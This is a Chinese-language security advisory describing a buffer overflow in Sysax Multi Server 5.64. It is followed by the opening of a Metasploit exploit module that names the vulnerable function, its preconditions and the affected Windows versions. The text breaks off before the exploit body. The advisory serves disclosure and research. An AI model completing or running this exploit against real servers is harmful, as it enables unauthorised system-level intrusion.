发布日期:2012-07-29
更新日期:2012-07-31
受影响系统:
sysax Sysax Multi Server 5.64
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54713
Sysax Multi Server是windows平台下的SSH2和FTP服务器。
Sysax Multi Server 5.64及之前版本在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞以提升的权限执行任意代码。
<*来源:Matt Andreko
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Matt Andreko ()提供了如下测试方法:
require 'msf/core'
require 'base64'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sysax Multi Server 5.64 Create Folder BoF',
'Description' => %q{
This module exploits a stack buffer overflow in the create folder function
in Sysax Multi Server 5.64. This issue was fixed in 5.66.
You must have valid credentials to trigger the vulnerability. Your credentials
must also have the create folder permission and the HTTP option has to be enabled.
This module will log into the server, get your a SID token and then proceed to exploit
the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
XP SP3, and Server 2003 SP1-SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64
'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50
],
'Version' => '$Revision:$',
'References' =>
[
[ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update
[ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x2F",
},